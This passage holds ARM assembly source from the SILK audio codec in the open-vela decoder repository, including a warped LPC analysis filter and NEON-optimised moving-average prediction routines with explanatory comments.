strh val_const4, [ptr_out_hi, #-2]
L(2)
#else
cmp out_tmpla, val_const2
strgth val_const3, [ptr_out_lo, #-2]
cmn out_tmpla, val_const2
strlth val_const4, [ptr_out_lo, #-2]
cmp out_tmpha, val_const2
strgth val_const3, [ptr_out_hi, #-2]
cmn out_tmpha, val_const2
strlth val_const4, [ptr_out_hi, #-2]
#endif
subs idx_k2, idx_k2, #1
bgt LR(1, b)
add sp, sp, #12
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 4,326 | silk/src/SKP_Silk_prefilter_FIX_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#include "SKP_Silk_AsmPreproc.h"
#if ( EMBEDDED_ARM >= 6 )
/*
 * Warped LPC analysis filter (fixed point).
 * C signature (per the argument loads below):
 *   void SKP_Silk_warped_LPC_analysis_filter_FIX(
 *       state, res, coef_Q13, input, lambda_Q16, length, order )
 * For each input sample, runs an all-pass warped filter chain of `order`
 * stages (smlawb = 32x16 -> top-32 multiply-accumulate), accumulates the
 * prediction, and stores the saturated residual input - round(acc >> 11).
 * Register roles:
 */
VARDEF ptr_state, r0
VARDEF ptr_res, r1
VARDEF val_tmp2, r1
VARDEF val_state0, r1
VARDEF ptr_coef, r2
VARDEF ptr_input, r3
VARDEF val_tmp, r3
VARDEF val_lambda, r4
VARDEF val_state1, r5
VARDEF val_state2, r6
VARDEF val_tmp1, _r7
VARDEF val_coef, r8
VARDEF val_input, sb
VARDEF val_acc, sl
VARDEF val_order, ip
VARDEF val_length, lr
/* Spill slots for the four pointer arguments (regs are reused as scratch) */
.set sp_state_ptr, 0
.set sp_res_ptr, 4
.set sp_coef_Q13_ptr, 8
.set sp_input_ptr, 12
.globl SYM(SKP_Silk_warped_LPC_analysis_filter_FIX)
SYM(SKP_Silk_warped_LPC_analysis_filter_FIX):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #16
/* Offsets of the stack-passed arguments after prologue + local area */
.set ptr_lambda_Q16, 56
.set ptr_length, 60
.set ptr_order, 64
str r0, [sp, #sp_state_ptr]
str r1, [sp, #sp_res_ptr]
str r2, [sp, #sp_coef_Q13_ptr]
str r3, [sp, #sp_input_ptr]
ldr val_lambda, [sp, #ptr_lambda_Q16]
ldr val_length, [sp, #ptr_length]
/*OUTER_LOOP: one iteration per input sample */
L(1)
ldmia ptr_state, {val_state0, val_state1, val_state2} /* state[0..2] */
ldrsh val_input, [ptr_input], #2 /* in16 = input[n] */
ldrh val_coef, [ptr_coef], #2 /* coef_Q13[0] */
ldr val_order, [sp, #ptr_order]
smlawb val_tmp2, val_state1, val_lambda, val_state0 /* tmp2 = state[0] + smulwb(state[1], lambda) */
str ptr_input, [sp, #sp_input_ptr]
mov val_tmp1, val_input, lsl #14 /* new state[0] = in16 << 14 */
sub val_tmp, val_state2, val_tmp2
str val_tmp1, [ptr_state], #4
str val_tmp2, [ptr_state], #4
smlawb val_tmp1, val_tmp, val_lambda, val_state1 /* next stage, pipelined */
smulwb val_acc, val_tmp2, val_coef /* acc = smulwb(tmp2, coef[0]) */
sub val_order, val_order, #2 /* first and last stage handled outside loop */
/*INNER_LOOP: two warped all-pass stages per iteration */
L(0)
ldrh val_coef, [ptr_coef], #2
ldr val_state1, [ptr_state, #4]
str val_tmp1, [ptr_state], #4
smlawb val_acc, val_tmp1, val_coef, val_acc
sub val_tmp, val_state1, val_tmp1
smlawb val_tmp2, val_tmp, val_lambda, val_state2
ldrh val_coef, [ptr_coef], #2
ldr val_state2, [ptr_state, #4]
str val_tmp2, [ptr_state], #4
subs val_order, val_order, #2
smlawb val_acc, val_tmp2, val_coef, val_acc
sub val_tmp, val_state2, val_tmp2
smlawb val_tmp1, val_tmp, val_lambda, val_state1
bgt LR(0, b)
str val_tmp1, [ptr_state] /* final stage state */
ldrh val_coef, [ptr_coef], #2
ldr ptr_res, [sp, #sp_res_ptr]
ldr ptr_input, [sp, #sp_input_ptr]
ldr ptr_coef, [sp, #sp_coef_Q13_ptr] /* rewind coef for next sample */
ldr ptr_state, [sp, #sp_state_ptr] /* rewind state for next sample */
smlawb val_acc, val_tmp1, val_coef, val_acc
/* res = in16 - RSHIFT_ROUND(acc, 11), saturated to int16 */
mov val_acc, val_acc, asr #10
add val_acc, val_acc, #1
mov val_acc, val_acc, asr #1
sub val_input, val_input, val_acc
ssat val_input, #16, val_input
strh val_input, [ptr_res], #2
subs val_length, val_length, #1
str ptr_res, [sp, #sp_res_ptr]
bgt LR(1, b)
add sp, sp, #16
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
|
open-vela/external_silk-v3-decoder | 47,507 | silk/src/SKP_Silk_MA_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=7
/*
 * SKP_Silk_MA_Prediction: moving-average prediction filter (B in Q12).
 * C equivalent per sample:
 *   out[k]  = SAT16( RSHIFT_ROUND( (in[k] << 12) - S[0], 12 ) )
 *   S[d]    = S[d+1] + in[k] * B[d]      for d < order-1
 *   S[o-1]  = in[k] * B[order-1]
 * Args (AAPCS): r0 = in, r1 = B, r2 = S, r3 = out; stack: len, order.
 * Entry dispatch: picks a NEON path for order 8/12/16, the ARMv6 SIMD
 * path for other even orders >= 6, else the generic (odd-order) path.
 */
VARDEF val_order, r5
VARDEF val_len, r4
VARDEF tmp_len, r5
/* Spill slots for the four pointer arguments */
.set sp_ptr_in, 0
.set sp_ptr_B, 4
.set sp_ptr_S, 8
.set sp_ptr_out, 12
.globl SYM(SKP_Silk_MA_Prediction)
SYM(SKP_Silk_MA_Prediction):
stmdb sp!, {r4-r10, fp, ip, lr}
vpush {q0-q7}
vpush {q8-q11}
add fp, sp, #228
sub sp, sp, #16
/* Offsets of the stack-passed arguments after prologue + local area */
.set arg_len, 248
.set arg_order, 252
/*LOAD INPUT ARGS*/
ldr val_order, [sp, #arg_order] /*order*/
ldr val_len, [sp, #arg_len] /*len*/
ands _r7, r1, #3 /*CHECK: if ( B is 4 byte aligned ) Prerequisite for ARMv6 SIMD*/
bne LR(2, f)
ands r6, val_order, #1 /*CHECK: if ( order % 2 == 0 ) Prerequisite for ARMv6 SIMD*/
bne LR(2, f)
cmp val_order, #8 /*CHECK: if ( order == 8 ) ARMv7 SIMD*/
beq LR(5, f)/*SYM(SKP_Silk_MA_Prediction_ARMv7_order8)*/
cmp val_order, #12 /*CHECK: if ( order == 12 ) ARMv7 SIMD*/
beq LR(6, f)/*SYM(SKP_Silk_MA_Prediction_ARMv7_order12)*/
cmp val_order, #16 /*CHECK: if ( order == 16 ) ARMv7 SIMD*/
beq LR(7, f)/*SYM(SKP_Silk_MA_Prediction_ARMv7_order16)*/
cmp val_order, #6 /*CHECK: if ( order >= 6 ) Prerequisite for ARMv6 SIMD*/
blt LR(2, f)
VARDEF ptr1_in, sb
VARDEF ptr1_out, sl
VARDEF ptr1_S, ip
VARDEF ptr1_B, lr
VARDEF val1_in, r0
VARDEF val1_B, r6
VARDEF val1_S0, r1
VARDEF val1_S1, r2
VARDEF val1_S2, r3
VARDEF val1_SO1, _r7
VARDEF val1_SO2, r8
VARDEF val1_out, r1
VARDEF val1_tmp, r3
// ARMv6 SIMD
// order % 2 == 0: two state updates per loop iteration, B read pairwise
// as one 32-bit word (smlabb uses its low half, smlabt its high half).
str r0, [sp, #sp_ptr_in]
str r1, [sp, #sp_ptr_B]
str r2, [sp, #sp_ptr_S]
str r3, [sp, #sp_ptr_out]
mov ptr1_in, r0 /*in*/
mov ptr1_out, r3 /*out*/
L(0)
ldr ptr1_S, [sp, #sp_ptr_S] /*S*/
ldr ptr1_B, [sp, #sp_ptr_B] /*B*/
ldrsh val1_in, [ptr1_in], #2 /*in[k]*/
ldr val1_S0, [ptr1_S], #4 /*S[0]*/
ldr val_order, [sp, #arg_order] /*order*/
ldr val1_S1, [ptr1_S], #4 /*S[1]*/
rsb val1_tmp, val1_S0, val1_in, lsl #12 /*SKP_LSHIFT(in16, 12) - S[0]*/
ldr val1_B, [ptr1_B], #4 /*B[0], B[1]*/
mov val1_tmp, val1_tmp, asr #11
sub val_order, val_order, #4 /*order - 2 - 2*/
add val1_out, r3, #1 /*SKP_RSHIFT_ROUND*/
ldr val1_S2, [ptr1_S], #4 /*S[2]*/
ssat val1_out, #16, val1_out, asr #1 /*SKP_SAT16( out32 )*/
strh val1_out, [ptr1_out], #2 /*save it to out[k]*/
L(1)
smlabb val1_SO1, val1_in, val1_B, val1_S1 /*SKP_SMLABB(S[d + 1], in16, B32)*/
smlabt val1_SO2, val1_in, val1_B, val1_S2 /*SKP_SMLABT(S[d + 2], in16, B32)*/
ldr val1_S1, [ptr1_S], #4 /*S[d+1]*/
ldr val1_S2, [ptr1_S], #-16 /*S[d+2]*/
ldr val1_B, [ptr1_B], #4 /*B[d], B[d+1]*/
subs val_order, val_order, #2
str val1_SO1, [ptr1_S], #4
str val1_SO2, [ptr1_S], #16
bgt LR(1, b)
/* Last two taps: final S[order-1] has no S[order] term (smulbt) */
smlabb val1_SO1, val1_in, val1_B, val1_S1 /*SKP_SMLABB(S[d + 1], in16, B32)*/
smlabt val1_SO2, val1_in, val1_B, val1_S2 /*SKP_SMLABT(S[d + 2], in16, B32)*/
ldr val1_S1, [ptr1_S], #-12 /*S[d+1]*/
ldr val1_B, [ptr1_B] /*B[d], B[d+1]*/
str val1_SO1, [ptr1_S], #4
str val1_SO2, [ptr1_S], #4
smlabb val1_SO1, val1_in, val1_B, val1_S1 /*SKP_SMLABB(S[d + 1], in16, B32)*/
smulbt val1_SO2, val1_in, val1_B /*SKP_SMULBT(in16, B32): last state has no add term*/
subs val_len, val_len, #1
str val1_SO1, [ptr1_S], #4
str val1_SO2, [ptr1_S]
bgt LR(0, b)
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
/*
 * Generic (odd-order / unaligned-B) path of SKP_Silk_MA_Prediction.
 * Per sample: out[k] = SAT16(RSHIFT_ROUND((in[k] << 12) - S[0], 12));
 *             S[d] = S[d+1] + in[k]*B[d], last S gets in[k]*B[order-1].
 * S[0] is kept in a register (val2_S0) across samples and written back once
 * at the end; S in memory is addressed from S+4 (hence the add r2, r2, #4).
 *
 * BUG FIX: the first coefficient was loaded into val2_in (r0), clobbering
 * in[k], and the first state update multiplied val2_in by itself, yielding
 * B[0]*B[0] + S[1] instead of in[k]*B[0] + S[1]; all later taps then used
 * B[0] in place of in[k]. The structurally identical Q13 path below loads
 * B[0] into a separate register (r2) -- mirrored here via the (previously
 * unused) val2_B alias. r2 is dead at that point in this path: it is
 * overwritten inside the inner loop and reloaded from the stack afterwards.
 */
VARDEF ptr2_in, r6
VARDEF ptr2_out, sb
VARDEF val2_S0, lr
VARDEF ptr2_B, _r7
VARDEF ptr2_S, r8
VARDEF val2_in, r0
VARDEF val2_B, r2
VARDEF val2_B1, r1
VARDEF val2_S1, r3
VARDEF val2_out, r1
VARDEF val2_S2, r2
// order % 2 != 0
L(2)
add r2, r2, #4
str r0, [sp, #sp_ptr_in]
str r1, [sp, #sp_ptr_B]
str r2, [sp, #sp_ptr_S]
str r3, [sp, #sp_ptr_out]
mov ptr2_in, r0 /*in_ptr*/
mov ptr2_out, r3 /*out_ptr*/
ldr val2_S0, [r2, #-4] /*S0*/
L(0)
ldrsh val2_in, [ptr2_in], #2 /*in[k]*/
ldr val_order, [sp, #arg_order] /*order*/
ldr ptr2_B, [sp, #sp_ptr_B]
ldr ptr2_S, [sp, #sp_ptr_S] /*S_ptr*/
rsb val2_out, val2_S0, val2_in, lsl #12 /*SKP_LSHIFT(in16, 12) - S[0]*/
ldrsh val2_B, [ptr2_B], #2 /*B[0] -- FIX: was loaded into val2_in, clobbering in[k]*/
mov val2_out, val2_out, asr #11
ldr val2_S1, [ptr2_S]
add val2_out, val2_out, #1 /*SKP_RSHIFT_ROUND*/
smlabb val2_S0, val2_in, val2_B, val2_S1 /*FIX: S[0] = in16*B[0] + S[1] (was in*in)*/
ssat val2_out, #16, val2_out, asr #1 /*SKP_SAT16( out32 )*/
sub val_order, val_order, #3
ldr val2_S1, [ptr2_S, #4]
strh val2_out, [ptr2_out], #2
ldrsh val2_B1, [ptr2_B], #2
L(1)
smlabb val2_S2, val2_in, val2_B1, val2_S1 /*S[d] = S[d+1] + in16*B[d]*/
ldr val2_S1, [ptr2_S, #8]
ldrsh val2_B1, [ptr2_B], #2
str val2_S2, [ptr2_S], #4
subs val_order, val_order, #1
bgt LR(1, b)
smlabb val2_S2, val2_in, val2_B1, val2_S1
ldrsh val2_B1, [ptr2_B], #2
str val2_S2, [ptr2_S], #4
smulbb val2_S2, val2_in, val2_B1 /*last state: in16*B[order-1], no add term*/
subs val_len, val_len, #1
str val2_S2, [ptr2_S]
bgt LR(0, b)
ldr val2_S2, [sp, #sp_ptr_S]
str val2_S0, [r2, #-4] /*write register-held S[0] back to memory*/
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
/*SYM(SKP_Silk_MA_Prediction_ARMv7_order8):*/
/*
 * NEON path for order == 8. All 8 B coefficients live in d0/d1 and all 8
 * states in q2/q3 for the whole call. Each sample shifts the state pipeline
 * left one lane (vext) while S[0] exits into q5/r6, then accumulates
 * in16 * B into all lanes (vmlal.s16). The main loop processes 4 samples
 * per iteration and produces 4 outputs at once; the tail loop handles
 * len % 4 samples one at a time.
 */
L(5)
VARDEF ptr3_in, sb
VARDEF ptr3_out, sl
VARDEF val3_rS0, r6
VARDEF const3_2048, r3
VARDEF val3_in0, r0
VARDEF val3_in1, r1
VARDEF val3_out32, r8
VARDEFD val3_B0_lo, d0
VARDEFD val3_b0_hi, d1
VARDEFQ val3_S0, q2
VARDEFD val3_S0_lo, d4
VARDEFD val3_S0_hi, d5
VARDEFQ val3_S1, q3
VARDEFD val3_S1_lo, d6
VARDEFD val3_S1_hi, d7
VARDEFQ val3_S2_zero, q4
VARDEFQ val3_S_0, q5
VARDEFQ const3, q7
VARDEFQ val3_in, q1
VARDEFD val3_in_lo, d2
VARDEFD val3_in_hi, d3
VARDEFQ val3_out, q6
VARDEFD val3_out_lo, d12
VARDEFD val3_out_hi, d13
str r0, [sp, #sp_ptr_in]
str r1, [sp, #sp_ptr_B]
str r2, [sp, #sp_ptr_S]
str r3, [sp, #sp_ptr_out]
cmp val_len, #4
mov ptr3_in, r0
mov ptr3_out, r3
ldr val3_rS0, [r2]
vld1.16 {val3_B0_lo, val3_b0_hi}, [r1] /*read all B*/
vld1.32 {val3_S0_lo, val3_S0_hi, val3_S1_lo, val3_S1_hi}, [r2] /*read all S*/
vmov.i32 val3_S2_zero, #0 /*clear q4*/
mov const3_2048, #2048 /*r3 = 1 << 11, will be used for rounding.*/
and tmp_len, val_len, #3 /*r5 = r4 % 4 ==> numbers in second loop*/
blt LR(3, f)
vdup.32 const3, const3_2048 /*d12 = [2048] [2048]*/
sub val_len, val_len, #4
L(2) // Input/Output are processed 4 samples per iteration
ldrsh val3_in0, [ptr3_in], #2 /*in[k]*/
ldrsh val3_in1, [ptr3_in], #2
vext.32 val3_S_0, val3_S_0, val3_S0, #1 /*shift S[2k] in */
vdup.16 val3_in, val3_in0 /*mov r0 to q1(d2, d3)*/
vext.32 val3_S0, val3_S0, val3_S1, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val3_S1, val3_S1, val3_S2_zero, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vmlal.s16 val3_S0, val3_B0_lo, val3_in_lo /*calculate S[0-3]*/
vmlal.s16 val3_S1, val3_b0_hi, val3_in_hi /*calculate S[4-7]*/
vmov val3_out_lo, val3_in0, val3_in1 /*in[2k], in[2k]+1*/
vext.32 val3_S_0, val3_S_0, val3_S0, #1 /*shift S[2k] in */
vdup.16 val3_in, val3_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val3_S0, val3_S0, val3_S1, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val3_S1, val3_S1, val3_S2_zero, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vmlal.s16 val3_S0, val3_B0_lo, val3_in_lo /*calculate S[0-3]*/
vmlal.s16 val3_S1, val3_b0_hi, val3_in_hi /*calculate S[4-7]*/
ldrsh val3_in0, [ptr3_in], #2 /*in[k]*/
ldrsh val3_in1, [ptr3_in], #2
vext.32 val3_S_0, val3_S_0, val3_S0, #1 /*shift S[2k] in */
vdup.16 val3_in, val3_in0 /*mov r0 to q1(d2, d3)*/
vext.32 val3_S0, val3_S0, val3_S1, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val3_S1, val3_S1, val3_S2_zero, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vmlal.s16 val3_S0, val3_B0_lo, val3_in_lo /*calculate S[0-3]*/
vmlal.s16 val3_S1, val3_b0_hi, val3_in_hi /*calculate S[4-7]*/
vmov val3_out_hi, val3_in0, val3_in1 /*in[2k], in[2k]+1*/
vext.32 val3_S_0, val3_S_0, val3_S0, #1 /*shift S[2k] in */
vdup.16 val3_in, val3_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val3_S0, val3_S0, val3_S1, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val3_S1, val3_S1, val3_S2_zero, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vmlal.s16 val3_S0, val3_B0_lo, val3_in_lo /*calculate S[0-3]*/
vmlal.s16 val3_S1, val3_b0_hi, val3_in_hi /*calculate S[4-7]*/
/* 4 outputs at once: (in << 12) - S[0], round via saturating +2048, >>12 with narrowing saturation */
vshl.s32 val3_out, val3_out, #12 /*SKP_LSHIFT(in16, 12)*/
vsub.s32 val3_out, val3_out, val3_S_0 /*SKP_LSHIFT(in16, 12) - S[0]*/
vqadd.s32 val3_out, val3_out, const3 /*qadd out32, out32, 2048*/
vqshrn.s32 d10, val3_out, #12
subs val_len, val_len, #4
vst1.16 d10, [ptr3_out]!
bge LR(2, b)
cmp tmp_len, #0
beq LR(4, f)
vst1.32 val3_S0_lo, [sp]
ldr val3_rS0, [sp] /*r6 = new [S0]*/
L(3) // Input/Output are processed 1 by 1
L(0)
ldrsh val3_in0, [ptr3_in], #2 /*in[k]*/
vext.32 val3_S0, val3_S0, val3_S1, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val3_S1, val3_S1, val3_S2_zero, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vdup.16 val3_in, val3_in0 /*mov r0 to q1(d2, d3)*/
rsb val3_out32, val3_rS0, r0, lsl #12 /*out32 = SKP_LSHIFT(in16, 12) - S[0];*/
vmlal.s16 val3_S0, val3_B0_lo, val3_in_lo /*calculate S[0-3]*/
vmlal.s16 val3_S1, val3_b0_hi, val3_in_hi /*calculate S[4-7]*/
vst1.32 val3_S0_lo, [sp]
qadd val3_out32, val3_out32, const3_2048
ssat val3_out32, #16, val3_out32, asr #12 /*out = round and sat*/
subs tmp_len, tmp_len, #1
strh val3_out32, [ptr3_out], #2
ldr val3_rS0, [sp] /*r6 = new [S0]*/
bgt LR(0, b)
L(4)
vst1.32 {val3_S0_lo, val3_S0_hi, val3_S1_lo, val3_S1_hi}, [r2] /*write states back*/
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
/*SYM(SKP_Silk_MA_Prediction_ARMv7_order16):*/
/*
 * NEON path for order == 16. Same pipeline scheme as the order-8 path above,
 * with 16 coefficients in d0-d3 and 16 states in q2-q5; q6 feeds zeros into
 * the pipeline tail and q8 collects the outgoing S[0] lanes. S was read with
 * a post-incremented pointer, hence the sub r2, r2, #32 before write-back.
 */
L(7)
VARDEF ptr4_in, sb
VARDEF ptr4_out, sl
VARDEF val4_rS0, r6
VARDEF const4_2048, r3
VARDEF val4_in0, r0
VARDEF val4_in1, r1
VARDEF val4_out32, r8
VARDEFD val4_B0_lo, d0
VARDEFD val4_B0_hi, d1
VARDEFD val4_B1_lo, d2
VARDEFD val4_B1_hi, d3
VARDEFQ val4_S1, q2
VARDEFD val4_S1_lo, d4
VARDEFD val4_S1_hi, d5
VARDEFQ val4_S2, q3
VARDEFD val4_S2_lo, d6
VARDEFD val4_S2_hi, d7
VARDEFQ val4_S3, q4
VARDEFD val4_S3_lo, d8
VARDEFD val4_S3_hi, d9
VARDEFQ val4_S4, q5
VARDEFD val4_S4_lo, d10
VARDEFD val4_S4_hi, d11
VARDEFQ val4_S5, q6
VARDEFQ val4_S0, q8
VARDEFD val4_S0_lo, d16
VARDEFQ val4_in, q9
VARDEFD val4_in_lo, d18
VARDEFD val4_in_hi, d19
VARDEFQ val4_out, q10
VARDEFD val4_out_lo, d20
VARDEFD val4_out_hi, d21
VARDEFQ val4_const, q7
str r0, [sp, #sp_ptr_in]
str r1, [sp, #sp_ptr_B]
str r2, [sp, #sp_ptr_S]
str r3, [sp, #sp_ptr_out]
cmp val_len, #4
mov ptr4_in, r0 /*in*/
mov ptr4_out, r3 /*out*/
ldr val4_rS0, [r2] /*r6 = S[0]*/
vld1.16 {val4_B0_lo, val4_B0_hi, val4_B1_lo, val4_B1_hi}, [r1] /*read all 16 Bs*/
vld1.32 {val4_S1_lo, val4_S1_hi, val4_S2_lo, val4_S2_hi}, [r2]! /*read first 8 Ss*/
vld1.32 {val4_S3_lo, val4_S3_hi, val4_S4_lo, val4_S4_hi}, [r2] /*read last 8 Ss*/
vmov.i32 val4_S5, #0 /*clear q6*/
mov const4_2048, #2048 /*r3 = 1 << 11, will be used for rounding.*/
and tmp_len, val_len, #3 /*r5 = r4 % 4 ==> numbers in second loop*/
blt LR(3, f)
vdup.32 val4_const, const4_2048 /*d12 = [2048] [2048]*/
sub val_len, val_len, #4
L(2) // Input/Output are processed 4 samples per iteration
ldrsh val4_in0, [ptr4_in], #2 /*in[k]*/
ldrsh val4_in1, [ptr4_in], #2
vext.32 val4_S0, val4_S0, val4_S1, #1 /*shift S[2k] in */
vdup.16 val4_in, val4_in0 /*mov r0 to q9(d2, d3)*/
vext.32 val4_S1, val4_S1, val4_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val4_S2, val4_S2, val4_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val4_S3, val4_S3, val4_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vext.32 val4_S4, val4_S4, val4_S5, #1 /*shift q5 by 32bit and put 32-lsb of q6 to 32-msb q5*/
vmlal.s16 val4_S1, val4_B0_lo, val4_in_lo /*calculate S[0-3]*/
vmlal.s16 val4_S2, val4_B0_hi, val4_in_lo /*calculate S[4-7]*/
vmlal.s16 val4_S3, val4_B1_lo, val4_in_lo /*calculate S[8-11]*/
vmlal.s16 val4_S4, val4_B1_hi, val4_in_lo /*calculate S[12-15]*/
vmov val4_out_lo, val4_in0, val4_in1 /*in[2k], in[2k]+1 ==> q10*/
vext.32 val4_S0, val4_S0, val4_S1, #1 /*shift S[2k] in */
vdup.16 val4_in, val4_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val4_S1, val4_S1, val4_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val4_S2, val4_S2, val4_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val4_S3, val4_S3, val4_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vext.32 val4_S4, val4_S4, val4_S5, #1 /*shift q5 by 32bit and put 32-lsb of q6 to 32-msb q5*/
vmlal.s16 val4_S1, val4_B0_lo, val4_in_lo /*calculate S[0-3]*/
vmlal.s16 val4_S2, val4_B0_hi, val4_in_lo /*calculate S[4-7]*/
vmlal.s16 val4_S3, val4_B1_lo, val4_in_lo /*calculate S[8-11]*/
vmlal.s16 val4_S4, val4_B1_hi, val4_in_lo /*calculate S[12-15]*/
ldrsh val4_in0, [ptr4_in], #2 /*in[k]*/
ldrsh val4_in1, [ptr4_in], #2
vext.32 val4_S0, val4_S0, val4_S1, #1 /*shift S[2k] in */
vdup.16 val4_in, val4_in0 /*mov r0 to q9(d2, d3)*/
vext.32 val4_S1, val4_S1, val4_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val4_S2, val4_S2, val4_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val4_S3, val4_S3, val4_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vext.32 val4_S4, val4_S4, val4_S5, #1 /*shift q5 by 32bit and put 32-lsb of q6 to 32-msb q5*/
vmlal.s16 val4_S1, val4_B0_lo, val4_in_lo /*calculate S[0-3]*/
vmlal.s16 val4_S2, val4_B0_hi, val4_in_lo /*calculate S[4-7]*/
vmlal.s16 val4_S3, val4_B1_lo, val4_in_lo /*calculate S[8-11]*/
vmlal.s16 val4_S4, val4_B1_hi, val4_in_lo /*calculate S[12-15]*/
vmov val4_out_hi, val4_in0, val4_in1 /*in[2k], in[2k]+1 ==> q10*/
vext.32 val4_S0, val4_S0, val4_S1, #1 /*shift S[2k] in */
vdup.16 val4_in, val4_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val4_S1, val4_S1, val4_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val4_S2, val4_S2, val4_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val4_S3, val4_S3, val4_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vext.32 val4_S4, val4_S4, val4_S5, #1 /*shift q5 by 32bit and put 32-lsb of q6 to 32-msb q5*/
vmlal.s16 val4_S1, val4_B0_lo, val4_in_lo /*calculate S[0-3]*/
vmlal.s16 val4_S2, val4_B0_hi, val4_in_lo /*calculate S[4-7]*/
vmlal.s16 val4_S3, val4_B1_lo, val4_in_lo /*calculate S[8-11]*/
vmlal.s16 val4_S4, val4_B1_hi, val4_in_lo /*calculate S[12-15]*/
